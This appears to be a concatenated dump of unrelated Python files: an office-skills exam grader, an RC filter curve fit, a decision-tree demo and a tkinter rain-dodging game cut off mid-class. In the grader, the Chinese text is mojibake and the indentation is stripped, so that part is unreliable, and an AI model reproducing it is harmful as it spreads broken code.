sht.Rows(3).RowHeight = 30#่ก้ซ
sht.Cells(row, col).HorizontalAlignment = -4131 #ๆฐดๅนณๅฑ
ไธญxlCenter
sht.Cells(row, col).VerticalAlignment = -4160 #
def rowHeightOper(self,sheet,row,height):
sht = self.xlBook.Worksheets(sheet)
sht.Rows(row).RowHeight = height
def deleteRow(self, sheet, row):
sht = self.xlBook.Worksheets(sheet)
sht.Rows(row).Delete()#ๅ ้ค่ก
sht.Columns(row).Delete()#ๅ ้คๅ
def getRange(self, sheet, row1, col1, row2, col2): #่ทๅพไธๅๅบๅ็ๆฐๆฎ๏ผ่ฟๅไธบไธไธชไบ็ปดๅ
็ป
"return a 2d array (i.e. tuple of tuples)"
sht = self.xlBook.Worksheets(sheet)
return sht.Range(sht.Cells(row1, col1), sht.Cells(row2, col2)).Value
def addPicture(self, sheet, pictureName, Left, Top, Width, Height): #ๆๅ
ฅๅพ็
"Insert a picture in sheet"
sht = self.xlBook.Worksheets(sheet)
sht.Shapes.AddPicture(pictureName, 1, 1, Left, Top, Width, Height)
def cpSheet(self, before): #ๅคๅถๅทฅไฝ่กจ
"copy sheet"
shts = self.xlBook.Worksheets
shts(1).Copy(None,shts(1))
def judgeRowHeight(self,OperStr):#่ก้ซๆไฝ
print('ๆญฃๅจๅฎๆ่ฆๆฑ',OperStr)
def judgeColWidth(self,OperStr):
print('ๆญฃๅจๅฎๆ่ฆๆฑ',OperStr)
def judgeFormula(self,OperStr):
print('ๆญฃๅจๅฎๆ่ฆๆฑ',OperStr)
def judgeFunction(self,OperStr):
print('ๆญฃๅจๅฎๆ่ฆๆฑ',OperStr)
def judgeSort(self,OperStr):
print('ๆญฃๅจๅฎๆ่ฆๆฑ',OperStr)
def judgeChart(self,OperStr):
print('ๆญฃๅจๅฎๆ่ฆๆฑ',OperStr)
def judgeBoxLine(self,OperStr):
print('ๆญฃๅจๅฎๆ่ฆๆฑ',OperStr)
def judgeOperFromStr(self,OperStr):#ๆ นๆฎๅฐ้ขๆๆฌ้ๆฉๅฏนๅบ็ๆไฝ
if OperStr.find("่ก้ซ") !=-1:
print("่ฟๅ
ฅ่ก้ซๆไฝ")
self.judgeRowHeight(OperStr)
print("็ปๆ่ก้ซๆไฝ")
if OperStr.find("ๅๅฎฝ") !=-1:
print("่ฟๅ
ฅๅๅฎฝๆไฝ")
self.judgeColWidth(OperStr)
print("็ปๆๅๅฎฝๆไฝ")
if OperStr.find("ๅ
ฌๅผ") !=-1:
print("่ฟๅ
ฅๅ
ฌๅผๆไฝ")
self.judgeFormula(OperStr)
print("็ปๆๅ
ฌๅผๆไฝ")
if OperStr.find("ๅฝๆฐ") !=-1:
print("่ฟๅ
ฅๅฝๆฐๆไฝ")
self.judgeFunction(OperStr)
print("็ปๆๅฝๆฐๆไฝ")
if OperStr.find("ๆๆๆก็บฟ") !=-1:
print("่ฟๅ
ฅๆๆๆก็บฟๆไฝ")
self.judgeBoxLine(OperStr)
print("็ปๆๆๆๆก็บฟๆไฝ")
if OperStr.find("ๆๅบ") !=-1:
print("่ฟๅ
ฅๆๅบๆไฝ")
self.judgeSort(OperStr)
print("็ปๆๆๅบๆไฝ")
if OperStr.find("ๅพ่กจ") !=-1:
print("่ฟๅ
ฅๅพ่กจๆไฝ")
self.judgeChart(OperStr)
print("็ปๆๅพ่กจๆไฝ")
pass
'''
PPTๆไฝ้จๅ่ฏดๆ๏ผ
1.ๅจ็ปๆๆ
2.ๅๆขๆๆ
3.่ถ
็บง้พๆฅ
4.่ๆฏ
5.ๆๅ
ฅ๏ผๅพ็๏ผๅฃฐ้ณ๏ผ่ง้ข
่่ฏๆ ทไพ๏ผ
1.ๅจ็ฌฌๅๅผ ๅนป็ฏ็็ไธๆนๆๅ
ฅๆจชๆๆๆฌๆก๏ผๅจๆๆฌๆกไธญ่พๅ
ฅโๅๆ้ฅผโ๏ผๅญไฝ้ปไฝ๏ผๅญๅท32ใ
2.ๅฐ็ฌฌไธๅผ ๅนป็ฏ็็่ๆฏๅกซๅ
ๆๆ่ฎพ็ฝฎไธบ็บน็ๅกซๅ
๏ผ็บน็ไธบโ้ฑผ็ฑปๅ็ณโใ
3.่ฎพ็ฝฎ็ฌฌไธๅผ ๅนป็ฏ็็ๅๆขๆๆไธบโๆจ่ฟโ๏ผๅฃฐ้ณไธบโ้ผๆโใ
4.็ป็ฌฌๅๅผ ๅนป็ฏ็ๅณไพง็ๅพ็่ฎพ็ฝฎ่ฟๅ
ฅไธญ็โๅ่ฃโๅจ็ปๆๆ๏ผๆๆ้้กนไธบโไธญๅคฎๅไธไธๅฑๅผโใ
5.็ป็ฌฌไธๅผ ๅนป็ฏ็ไธญ็ๆๅญโ่ตๆก่ฑโๆทปๅ ่ถ
้พๆฅ๏ผไฝฟๅ
ถ้พๆฅๅฐ็ฌฌไบๅผ ๅนป็ฏ็ใ
'''
class PptOperation:
def __init__(self):
pass
def AnimationOper(self):
pass
def SwitchOper(self):
pass
def InsertOper(self,style):
pass
def BackgroundOper(self):
pass
def HyperlinkOper(self):
pass
def judgeAnimation(self,OperStr):
print('ๆญฃๅจๅฎๆ่ฆๆฑ',OperStr)
pattern = re.compile('โ(.*)โ')
print (pattern.findall(OperStr))
strFile=str(pattern.findall(OperStr))
file1=strFile.split("โ")
source=file1[0][2:]#่ทๅพๆบๆไปถ
print(source)
file2=strFile.split("โ")
dest=file2[1][0:-2]#่ทๅพ็ฎๆ ๆไปถ
print(dest)
def judgeSwitch(self,OperStr):
print('ๆญฃๅจๅฎๆ่ฆๆฑ',OperStr)
pattern = re.compile('โ(.*)โ')
print (pattern.findall(OperStr))
strFile=str(pattern.findall(OperStr))
file1=strFile.split("โ")
source=file1[0][2:]#่ทๅพๆบๆไปถ
print(source)
file2=strFile.split("โ")
dest=file2[1][0:-2]#่ทๅพ็ฎๆ ๆไปถ
print(dest)
def judgeInsert(self,OperStr):
print('ๆญฃๅจๅฎๆ่ฆๆฑ',OperStr)
def judgeBackground(self,OperStr):
print('ๆญฃๅจๅฎๆ่ฆๆฑ',OperStr)
def judgeHyperlink(self,OperStr):
print('ๆญฃๅจๅฎๆ่ฆๆฑ',OperStr)
def judgeOperFromStr(self,OperStr):#ๆ นๆฎๅฐ้ขๆๆฌ้ๆฉๅฏนๅบ็ๆไฝ
if OperStr.find("ๅจ็ป") !=-1:
print("่ฟๅ
ฅๅจ็ปๆไฝ")
self.judgeAnimation(OperStr)
print("็ปๆๅจ็ปๆไฝ")
if OperStr.find("ๅๆข") !=-1:
print("่ฟๅ
ฅๅๆขๆไฝ")
self.judgeSwitch(OperStr)
print("็ปๆๅๆขๆไฝ")
if OperStr.find("่ถ
็บง้พๆฅ") !=-1:
print("่ฟๅ
ฅ่ถ
็บง้พๆฅๆไฝ")
self.judgeHyperlink(OperStr)
print("็ปๆ่ถ
็บง้พๆฅๆไฝ")
if OperStr.find("่ๆฏ") !=-1:
print("่ฟๅ
ฅ่ๆฏๆไฝ")
self.judgeBackground(OperStr)
print("็ปๆ่ๆฏๆไฝ")
if OperStr.find("ๆๅ
ฅ") !=-1:
print("่ฟๅ
ฅๆๅ
ฅๆไฝ")
self.judgeInsert(OperStr)
print("็ปๆๆๅ
ฅๆไฝ")
'''
Inputๆๅญๅฝๅ
ฅๆไฝ้จๅ่ฏดๆ๏ผ
่่ฏๆณขๅ็ฅ่ฏ็น๏ผ
comๅฏน่ฑก็่ฐ็จๆผ็คบ๏ผ
class InputOperation:
'''
class OperationTypeJudge:
def __init__(self):
pass
def getType(self,OperStr):
if OperStr.find("ๆฟๆข") !=-1 or OperStr.find("้ฆ่ก็ผฉ่ฟ") !=-1:
print('่ฟๆฏword้ข่ฆๆฑ')
print('ๅทฒ่ฝฌword้ขๅค็')
elif OperStr.find("ๅ
ฌๅผ") !=-1 or OperStr.find("ๅฝๆฐ") !=-1:
print('่ฟๆฏexcel้ข่ฆๆฑ')
print('ๅทฒ่ฝฌexcel้ขๅค็')
elif OperStr.find("ๅๆข") !=-1 or OperStr.find("ๅจ็ป") !=-1:
print('่ฟๆฏppt้ข่ฆๆฑ')
print('ๅทฒ่ฝฌppt้ขๅค็')
pass
def getOperaPath(self):
pass
def getOperaFileName(self):
pass
'''
้ๆฉ้ข้จๅ่ฏดๆ๏ผ
'''
class SelectOperation:
    """Grading stub for multiple-choice questions; every hook is unimplemented."""
    def __init__(self):
        pass
    def getQusetionTxt(self,item):
        # Return the question text for `item`. ("Qusetion" typo kept: public name.)
        pass
    def getQusetionPic(self,item):
        # Return the question's picture for `item`.
        pass
    def getAnswer(self,item):
        # Return the candidate's chosen answer for `item`.
        pass
    def getCorrectAnswer(self,item):
        # Return the correct answer for `item`.
        pass
'''
ๅคๆญ้ข้จๅ่ฏดๆ๏ผ
'''
class JudgeOperation:
    """Grading stub for true/false questions; every hook is unimplemented."""
    def __init__(self):
        pass
    def getQusetionTxt(self,item):
        # Return the question text for `item`. ("Qusetion" typo kept: public name.)
        pass
    def getQusetionPic(self,item):
        # Return the question's picture for `item`.
        pass
    def getAnswer(self,item):
        # Return the candidate's answer for `item`.
        pass
    def getCorrectAnswer(self,item):
        # Return the correct answer for `item`.
        pass
if __name__ == "__main__":
win=WinOperation()
win.judgeOperFromStr('1ใๅจโ่จ็ฑปๆค็ฉโๆไปถๅคนไธญ๏ผๆฐๅปบไธไธชๅญๆไปถๅคนโ่ๅ่จ็ฑปโใ')
win.judgeOperFromStr('2ใๅฐๆไปถโๆทกๆฐด่ป.dddโ็งปๅจๅฐโ่ป็ฑปๆค็ฉโๆไปถๅคนไธญใ')
win.judgeOperFromStr('3ใ่ฎพ็ฝฎโ่บๆ่ป.aaaโๆไปถๅฑๆงไธบโๅช่ฏปโใ')
win.judgeOperFromStr('4ใๅจๆก้ขไธๅปบ็ซโ็ปฟ่ฒๆค็ฉโ็ๅฟซๆทๆนๅผใ')
word=WordOperation()
word.judgeOperFromStr('1. ๅฐๆ ้ขโๅธๆฉ้พๅฟโ่ฎพ็ฝฎไธบ้ปไฝ๏ผๅฑ
ไธญๅฏน้ฝใ')
word.judgeOperFromStr('2๏ผๅฐๆไธญ็ฌฌไบๆฎต๏ผ่ฟไธชๅฐๅญฆ่ฎพๅจไธๅบงๅบๅ
โฆโฆ๏ผ่ฎพ็ฝฎไธบ้ฆ่ก็ผฉ่ฟ2ๅญ็ฌฆใ')
word.judgeOperFromStr('3๏ผๅฐๆไธญๆๆ็โ็ฐ่ๅธโๆฟๆขไธบโ็ฐๅ
็โใ')
word.judgeOperFromStr('4. ่ฎพ็ฝฎ้กต่พน่ทไธบไธไธๅ2.5ๅ็ฑณ๏ผๅบ็จไบๆด็ฏๆๆกฃ๏ผใ')
word.judgeOperFromStr('5. ๅจๆญฃๆไธ้ข็็ฉบ็ฝๅคๆๅ
ฅ่บๆฏๅญ๏ผๅ
ๅฎนไธบโๅธๆฉ้พๅฟโ๏ผๆ ทๅผไปป้๏ผใ')
excel=ExcelOperation(r'c:/test.xls')
excel.judgeOperFromStr('1.ๅฐA2ๆๅจ่ก็่ก้ซ่ฎพ็ฝฎไธบ30๏ผ40ๅ็ด ๏ผใ')
excel.judgeOperFromStr('2.ๆ นๆฎๅทฅไฝ่กจไธญๆไพ็ๅ
ฌๅผ๏ผ่ฎก็ฎๅ็ญ็บง็โ3D็คพๅขๅไธๆฏไพโ๏ผๅนถๅฐ็ปๆๅกซๅๅจF3:F7ๅๅ
ๆ ผๅ
ใ')
excel.judgeOperFromStr('3.็ปA2:F8ๅๅ
ๆ ผๅบๅๅ ๆๆๆก็บฟใ')
excel.judgeOperFromStr('4.ๆโๆ ไบบๆบ็คพๅขไบบๆฐโ็ฑ้ซๅฐไฝๆๅบใ')
excel.judgeOperFromStr('5.้ๅฎA2:B7ๅๅ
ๆ ผๅบๅ๏ผๅถไฝโไธ็ปดๆ็บฟๅพโ๏ผๅนถๆๅ
ฅๅฐSheet1ๅทฅไฝ่กจไธญใ')
ppt=PptOperation()
ppt.judgeOperFromStr('1.ๅจ็ฌฌๅๅผ ๅนป็ฏ็็ไธๆนๆๅ
ฅๆจชๆๆๆฌๆก๏ผๅจๆๆฌๆกไธญ่พๅ
ฅโๅๆ้ฅผโ๏ผๅญไฝ้ปไฝ๏ผๅญๅท32ใ')
ppt.judgeOperFromStr('2.ๅฐ็ฌฌไธๅผ ๅนป็ฏ็็่ๆฏๅกซๅ
ๆๆ่ฎพ็ฝฎไธบ็บน็ๅกซๅ
๏ผ็บน็ไธบโ้ฑผ็ฑปๅ็ณโใ')
ppt.judgeOperFromStr('3.่ฎพ็ฝฎ็ฌฌไธๅผ ๅนป็ฏ็็ๅๆขๆๆไธบโๆจ่ฟโ๏ผๅฃฐ้ณไธบโ้ผๆโใ')
ppt.judgeOperFromStr('4.็ป็ฌฌๅๅผ ๅนป็ฏ็ๅณไพง็ๅพ็่ฎพ็ฝฎ่ฟๅ
ฅไธญ็โๅ่ฃโๅจ็ปๆๆ๏ผๆๆ้้กนไธบโไธญๅคฎๅไธไธๅฑๅผโใ')
ppt.judgeOperFromStr('5.็ป็ฌฌไธๅผ ๅนป็ฏ็ไธญ็ๆๅญโ่ตๆก่ฑโๆทปๅ ่ถ
้พๆฅ๏ผไฝฟๅ
ถ้พๆฅๅฐ็ฌฌไบๅผ ๅนป็ฏ็ใ')
|
468 | 170d0560c40f3f642f319f6113b68ab8a6bea9ef | import csv
import matplotlib.pyplot as plt
import numpy as np
from scipy.optimize import curve_fit
#funktion
def func(w, rc):
    """Amplitude response |U_C/U_0| = 1/sqrt(1 + (w*rc)^2) of a first-order
    RC low-pass at angular frequency w (rad/s) with time constant rc (s)."""
    attenuation = np.sqrt(1 + w ** 2 * rc ** 2)
    return 1 / attenuation
# Read the measurement data: frequency f, amplitude U, and the two
# oscilloscope time readings a, b used for the phase below.
with open('data/phase.csv' ) as csvfile:
    reader=csv.reader(csvfile, delimiter=',')
    header_row=next(reader)
    f, U, a, b = [], [], [], []
    for row in reader:
        f.append(row[0])
        U.append(row[1])
        a.append(row[2])
        b.append(row[3])
# CSV fields arrive as strings; convert each column to a float array
f=np.array(f,dtype=float)
U=np.array(U,dtype=float)
a=np.array(a,dtype=float)
b=np.array(b,dtype=float)
# Fit the RC time constant to the normalized amplitude U/U0 over angular
# frequency w = 2*pi*f
U0=0.6
popt, pcov = curve_fit(func, f*2*np.pi, U/U0)
a1=popt[0]
# Theory values for R and C
R_th=11.01*10**3
C_th=93.3*10**(-9)
# Plot measurements, fit and theory curve on a log frequency axis
plt.xlabel(r'$f\, / \, Hz$')
plt.ylabel(r'$\frac{U_c}{U_0}$', fontsize=15)
plt.grid()
plt.semilogx(f,U/U0,'rx',label='Messwerte')
x=np.linspace(20,30000,10000)
plt.semilogx(x,func(x*2*np.pi,a1),'b-',label='Ausgleichsrechnung')
plt.semilogx(x,func(x*2*np.pi,R_th*C_th),'g-',label='Theoriekurve')
plt.legend()
plt.savefig('plotb.pdf')
plt.show()
# Report fit uncertainty (sqrt of the covariance diagonal)
uncertainties = np.sqrt(np.diag(pcov))
# NOTE(review): the fitted parameter is printed negated; func is even in rc,
# so the fit may converge to a negative value -- confirm the sign convention.
print('RC =',-a1,'+-',uncertainties[0])
print('Theoriewert:',11.01*1000*93.3*10**(-9))
# NOTE(review): presumably a is the time shift and b the period, giving the
# phase in radians -- verify against the measurement protocol.
print('Phase:',(a/b)*np.pi*2)
469 | c9cf65eeec49eba004312491cdd2321200fa6a61 | import cv2
import pandas
from sklearn import tree
import pydotplus
from sklearn.tree import DecisionTreeClassifier
import matplotlib.pyplot as plt
import matplotlib.image as pltimg
# Load the training data; sklearn needs numeric features, so categorical
# columns are mapped to integer codes first.
df = pandas.read_csv("show.csv")
# Nationality strings -> integer codes
d = {'UK': 0, 'USA': 1, 'N': 2}
df['Nationality'] = df['Nationality'].map(d)
# Target label YES/NO -> 1/0
d = {'YES': 1, 'NO': 0}
df['Go'] = df['Go'].map(d)
######
features = ['Age', 'Experience', 'Rank', 'Nationality']
X = df[features]
y = df['Go']
#####
# Fit an unconstrained decision tree on all rows (no train/test split)
dtree = DecisionTreeClassifier()
dtree = dtree.fit(X, y)
# Export the fitted tree to Graphviz dot, render to PNG and display it
data = tree.export_graphviz(dtree, out_file=None, feature_names=features)
graph = pydotplus.graph_from_dot_data(data)
graph.write_png('mydecisiontree.png')
img=pltimg.imread('mydecisiontree.png')
imgplot = plt.imshow(img)
plt.show()
print(X)
print(y)
|
470 | c893095be88636e6cb06eb3b939d8106fbb7a8ca | #Arushi Patel (aruship)
from tkinter import *
import random
######################################
#images taken from wikipedia,pixabay,
#trans americas, clipartpanda,pngimg,
#findicons, microsoft word
######################################
####################################
# init
####################################
def init(data):
    """Reset the whole game model on `data`: score, mode, window geometry,
    speeds and the lists of falling objects; chains to init1 for the rest."""
    data.score =0
    data.mode = "splashScreen"
    data.timerDelay = 100
    # Canvas geometry and player radius/start position
    data.height = 800
    data.width = 800
    data.speed = 10
    data.speedAI = 12
    data.speedAI2 = 12
    data.switchOnProgress = False
    data.r = 25
    data.cx= 280
    data.cy=750
    data.onLeft1, data.onLeft2 = True, True
    data.win= False
    # Falling-object lists (coconuts per player/AI, power-ups, etc.)
    data.coconuts = []
    data.powerUps = []
    data.coconuts1 = []
    data.coconuts2 = []
    data.coconutsAI1 =[]
    data.coconutsAI2 = []
    data.invincible = []
    data.pauseDrops = False
    data.pause1Drop = False
    data.pause2Drop = False
    init1(data)
def init1(data):
    """Continue state setup: power-up flags, timers, and the image assets.
    NOTE(review): PhotoImage requires a Tk root window and the .gif files to
    be present in the working directory."""
    data.beInvincible = False
    data.Invincible1 = False
    data.Invincible2 = False
    data.scaryBug = []
    data.time = 0
    data.coconutFall = False
    data.sides = ["r", "l"]
    data.level = 1
    data.splashScreenTime = 0
    data.splashScreenDrops = []
    # Image assets (loaded once here, reused by the draw code)
    data.background= PhotoImage(file="tree.gif")
    data.deadScreen = PhotoImage(file = "deadBug.gif")
    data.ladyBug = PhotoImage(file = "lady.gif")
    data.winScreen= PhotoImage(file = "treeTop1.gif")
    data.winBug = PhotoImage(file = "littleBug.gif")
    data.halfBackground = PhotoImage(file = "halfTree.gif")
    data.umbrella = PhotoImage(file = "umbrella2.gif")
    data.spider = PhotoImage(file = "spider.gif")
    data.hourGlass = PhotoImage(file = "hourGlass.gif")
    data.splashScreen = PhotoImage(file = "splash.gif")
    init2(data)
def init2(data):
    """Continue init(): 2-player positions and level-editor button state."""
    data.tbg= PhotoImage(file = "tbg2.gif")
    data.click = PhotoImage(file = "click.gif")        # "selected" button image
    data.notClick = PhotoImage(file = "notClick.gif")  # "unselected" button image
    data.player1X = 150
    data.player1Y = 750
    data.player2X = 550
    data.player2Y = 750
    data.winner = None           # None while a 2-player round is in progress
    data.speed = 12
    data.speed2 = 12
    data.editorTime = 0
    data.editorDrops = []        # decorative background rain on menu screens
    data.margin = 100
    data.enter = False
    data.powerUpsEditor = None   # editor choices stay None until clicked
    data.yourSpeed = None
    data.rainSpeed = None
    data.slow= data.notClick
    data.medium = data.notClick
    data.fast = data.notClick
    data.drizzle = data.notClick
    data.rain =data.notClick
    data.thunderstorm = data.notClick
    init3(data)
def init3(data):
    """Continue init(): remaining buttons, score persistence, menu images."""
    data.yes = data.notClick
    data.no = data.notClick
    data.enter = data.notClick
    data.levelEditorLives =2
    data.rSpeed = None
    data.start = None            # y positions where power-up effects began
    data.start1 = None
    data.start2 = None
    data.difficulty = None
    data.mode1 = data.notClick   # splash-menu button images
    data.mode2 = data.notClick
    data.mode3 = data.notClick
    data.mode4 = data.notClick
    data.mode5 = data.notClick
    data.mode6 = data.notClick
    data.home = PhotoImage(file = "home.gif")
    data.helpScreen = PhotoImage(file = "help1.gif")
    data.title = PhotoImage(file = "title.gif")
    data.scoreList = []
    data.spotList = [270,364,458,552, 646, 740]  # lane x positions for spawns
    data.savedScores = readFile("score.txt")     # persisted scoreboard text
    if data.mode == "levelCreated":
        setEverything(data)
    initsplashScreenNumbers(data)
def initsplashScreenNumbers(data):
    """Continue init(): layout constants for the splash menu and gameplay.

    NOTE(review): despite its name, splashButtonY is used as the x coordinate
    of the menu button column, and the *ButtonX values as y coordinates (see
    splashScreenButtons).
    """
    data.splashButtonY = 425
    data.p1ButtonX= 225
    data.p2ButtonX = 290
    data.edButton = 355
    data.diffButton = 425
    data.helpButton = 490
    data.sboardButton = 555
    data.hitPenalty = 75         # pixels a bug is knocked down per raindrop hit
    data.splashText = data.height/2-20
    data.lives = 2
    data.levelMax = 8
    data.lane = 94               # horizontal distance between lanes
    data.Player1Min= 270         # playable x band in 1-player mode
    data.Player1Max = 740
    data.homeX =50               # home-button position (all screens)
    data.homeY = 650
    initScoreBoardHelp(data)
    init1Player(data)
def initScoreBoardHelp(data):
    """Continue init(): scoreboard/help screen layout and name-entry state."""
    data.tbgY=5*data.height/12
    data.txtTScore = 150
    data.S_P = 220
    data.numScores = 5           # how many top scores to show
    data.scorePos = data.height/10
    data.scoreShift = 270
    data.helpY = data.height/2-20
    data.name = ""               # name typed on the win screen
    data.printName = ""
    data.hit = False             # True once the 1-player bug is dead
    initAI(data)
def init1Player(data):
    """Continue init(): 1-player spawn margin around the playable band."""
    data.buffer = 40
def initAI(data):
    """Continue init(): layout constants for the AI-difficulty/editor menus."""
    data.AITY = 225
    data.easyX = 200             # x centres of the three choice buttons
    data.easyY = 300             # y of the first button row
    data.medX =400
    data.hardX = 600
    data.enterY = 450
    data.difS = 4                # AI speeds for easy/medium/hard
    data.difM = 6
    data.difH = 8
    data.last = 500              # y of the editor's yes/no row
    data.enterX = 575            # y of the editor's Enter button
    data.PUT = 450               # label y positions in the editor
    data.RST = 350
    data.YST = 250
####################################
# mode dispatcher
####################################
def mousePressed(event, data):
    """Route a mouse click to the handler for the current screen mode."""
    handlers = {
        "splashScreen": splashScreenMousePressed,
        "1Player": playerMousePressed,
        "2Player": twoPlayerMousePressed,
        "editor": editorMousePressed,
        "levelCreated": levelCreatedMousePressed,
        "AI": AIMousePressed,
        "difficulty": difficultyMousePressed,
        "scoreboard": scoreboardMousePressed,
        "help": helpMousePressed,
    }
    handler = handlers.get(data.mode)
    if handler is not None:
        handler(event, data)
def keyPressed(event, data):
    """Route a key press to the handler for the current screen mode."""
    handlers = {
        "splashScreen": splashKeyPressed,
        "1Player": playerKeyPressed,
        "2Player": twoPlayerKeyPressed,
        "editor": editorKeyPressed,
        "levelCreated": levelCreatedKeyPressed,
        "AI": AIKeyPressed,
        "difficulty": difficultyKeyPressed,
        "scoreboard": scoreboardKeyPressed,
        "help": helpKeyPressed,
    }
    handler = handlers.get(data.mode)
    if handler is not None:
        handler(event, data)
def timerFired(data):
    """Route a timer tick to the handler for the current screen mode."""
    handlers = {
        "splashScreen": splashScreenTimerFired,
        "1Player": playerTimerFired,
        "2Player": twoPlayerTimerFired,
        "editor": editorTimerFired,
        "levelCreated": levelCreatedTimerFired,
        "AI": AITimerFired,
        "difficulty": difficultyTimerFired,
        "scoreboard": scoreboardTimerFired,
        "help": helpTimerFired,
    }
    handler = handlers.get(data.mode)
    if handler is not None:
        handler(data)
def redrawAll(canvas, data):
    """Route a redraw request to the handler for the current screen mode."""
    handlers = {
        "splashScreen": splashScreenRedrawAll,
        "1Player": playerRedrawAll,
        "2Player": twoPlayerRedrawAll,
        "editor": editorRedrawAll,
        "levelCreated": levelCreatedRedrawAll,
        "AI": AIRedrawAll,
        "difficulty": difficultyRedrawAll,
        "scoreboard": scoreboardRedrawAll,
        "help": helpRedrawAll,
    }
    handler = handlers.get(data.mode)
    if handler is not None:
        handler(canvas, data)
####################################
# splashScreen mode
####################################
def splashScreenMousePressed(event, data):
    """Switch to the screen whose menu button was clicked on the splash page."""
    # All six buttons sit in one column centred on x == data.splashButtonY.
    if not (data.splashButtonY - 2 * data.r <= event.x <= data.splashButtonY + 2 * data.r):
        return
    buttons = (
        (data.p1ButtonX, "1Player"),
        (data.p2ButtonX, "2Player"),
        (data.edButton, "editor"),
        (data.diffButton, "difficulty"),
        (data.helpButton, "help"),
        (data.sboardButton, "scoreboard"),
    )
    for centreY, mode in buttons:
        if centreY - data.r <= event.y <= centreY + data.r:
            data.mode = mode
def splashKeyPressed(event, data):
    """The splash screen ignores key presses; navigation is mouse-only."""
    pass
def splashScreenTimerFired(data):
    """Animate the splash screen: spawn a drop every other tick, move all drops."""
    data.splashScreenTime += 1
    if data.splashScreenTime % 2 == 1:
        rainDropSplash(data)
    for backgroundDrop in data.splashScreenDrops:
        backgroundDrop.onTimerFired(data)
def splashScreenButtons(canvas, data):
    """Draw the six mode buttons down the splash screen's menu column."""
    columnX = data.splashButtonY
    entries = (
        (data.p1ButtonX, data.mode1),
        (data.p2ButtonX, data.mode2),
        (data.edButton, data.mode3),
        (data.diffButton, data.mode4),
        (data.helpButton, data.mode5),
        (data.sboardButton, data.mode6),
    )
    for y, buttonImage in entries:
        canvas.create_image(columnX, y, image=buttonImage)
def rainDropSplash(data):
    """Spawn one decorative raindrop at a random x along the top edge."""
    data.splashScreenDrops.append(Coconuts(random.randint(0, 800), 0))
def splashScreenRedrawAll(canvas, data):
    """Draw the splash screen: title, background rain, menu text and buttons."""
    canvas.create_image(data.width/2, data.splashText-10, image=data.title)
    for drop in data.splashScreenDrops: drop.draw(canvas)
    canvas.create_text(data.width/2, data.splashText, text="""
    1.) Single Player Level Mode
    2.) Two-Player Mode
    3.) Level Creator Practice Mode
    4.) Play Against the Computer
    5.) Help and Instructions
    6.) Scoreboard
    """, font="Arial 14 bold", fill = "yellow")
    splashScreenButtons(canvas, data)
####################################
# taken from class notes
####################################
def writeFile(path, contents):
    """Overwrite the file at *path* with *contents* (text mode)."""
    with open(path, "wt") as out:
        out.write(contents)
def readFile(path):
    """Return the full text contents of the file at *path*."""
    with open(path, "rt") as src:
        return src.read()
####################################
# 1Player mode
####################################
#Coconuts (from Mario game) represent the water drops
class Coconuts(object):
    """A falling raindrop (named after the falling coconuts of the Mario game)."""
    def __init__(self, x, y):
        # Centre of the drop.
        self.x = x
        self.y = y
        self.r = 9                  # half-size used for drawing
        self.fill = "deep sky blue"
        self.outline = "blue"
        self.speed = 30             # pixels fallen per timer tick
    def draw(self, canvas):
        """Draw the drop as a diamond centred on (x, y)."""
        top = (self.x, self.y - 2 * self.r)
        left = (self.x - self.r, self.y)
        bottom = (self.x, self.y + self.r)
        right = (self.x + self.r, self.y)
        canvas.create_polygon(*top, *left, *bottom, *right,
                              fill=self.fill, outline=self.outline, width=3)
    def onTimerFired(self, data):
        """Advance the drop straight down by one step."""
        self.y += self.speed
def hit(data):
    """Handle collisions between the player bug and falling raindrops.

    In 1-player / level-editor modes, a drop overlapping the bug (within
    data.r on both axes) knocks the bug down by data.hitPenalty, costs a
    life (editor mode) or score (1-player mode), and is removed from play.

    Bug fix: the original removed drops from data.coconuts while iterating
    it, which silently skipped the element following each removed drop;
    we now iterate over a snapshot.
    """
    if data.mode != "1Player" and data.mode != "levelCreated":
        return
    for coconut in list(data.coconuts):
        if (data.cy - data.r <= coconut.y <= data.cy + data.r and
                data.cx - data.r <= coconut.x <= data.cx + data.r):
            data.cy += data.hitPenalty
            if data.mode == "levelCreated":
                data.lives -= 1
                data.levelEditorLives -= 1
            elif data.hit == False and data.level < data.levelMax:
                # scoring penalty scales with the current level
                data.score -= data.level
            data.coconuts.remove(coconut)
def hit2Player(data):
    """Knock a 2-player bug down when a drop in its own column touches it.

    Skipped entirely for a player whose umbrella (invincibility) power-up
    is active.  Bug fix: each list is iterated over a snapshot, because
    removing from a list while iterating it skips the next element.
    """
    if data.mode != "2Player":
        return
    if data.Invincible1 == False:
        # power-up isn't active for player 1
        for coconut in list(data.coconuts1):
            if (data.player1Y - data.r <= coconut.y <= data.player1Y + data.r and
                    data.player1X - data.r <= coconut.x <= data.player1X + data.r):
                data.player1Y += data.hitPenalty
                data.coconuts1.remove(coconut)
    if data.Invincible2 == False:
        # power-up isn't active for player 2
        for coconut in list(data.coconuts2):
            if (data.player2Y - data.r <= coconut.y <= data.player2Y + data.r and
                    data.player2X - data.r <= coconut.x <= data.player2X + data.r):
                data.player2Y += data.hitPenalty
                data.coconuts2.remove(coconut)
class PowerUps(Coconuts):
    """Hour-glass power-up: falls like a raindrop, pauses the rain on pickup."""
    def __init__(self, x, y):
        super().__init__(x, y)
    def draw(self, canvas, data):
        # Drawn as the hour-glass sprite instead of the raindrop diamond.
        canvas.create_image(self.x, self.y, image=data.hourGlass)
def hitPause(data):
    """Activate the rain-pausing hour-glass power-up when a player touches one.

    Records the y position where the effect began in data.start/start1/start2
    so the timer code can expire the effect after enough climbing.
    Bug fix: iterates over a snapshot of data.powerUps — removing from the
    list while iterating it skipped the next power-up.
    """
    for powerUp in list(data.powerUps):
        if data.mode == "1Player" or data.mode == "levelCreated":
            if (data.cy - data.r <= powerUp.y <= data.cy + data.r and
                    data.cx - data.r <= powerUp.x <= data.cx + data.r):
                data.pauseDrops = True
                data.start = data.cy
                data.powerUps.remove(powerUp)
        elif data.mode == "2Player" or data.mode == "AI":
            # player 1
            if (data.player1Y - data.r <= powerUp.y <= data.player1Y + data.r and
                    data.player1X - data.r <= powerUp.x <= data.player1X + data.r):
                data.pause1Drop = True
                data.start1 = data.player1Y
                data.powerUps.remove(powerUp)
            # player 2
            if (data.player2Y - data.r <= powerUp.y <= data.player2Y + data.r and
                    data.player2X - data.r <= powerUp.x <= data.player2X + data.r):
                data.pause2Drop = True
                data.start2 = data.player2Y
                data.powerUps.remove(powerUp)
class Invincible(PowerUps):
    """Umbrella power-up: falls like a raindrop, grants temporary invincibility."""
    def __init__(self, x, y):
        super().__init__(x, y)
    def draw(self, canvas, data):
        # Drawn as the umbrella sprite instead of the hour-glass.
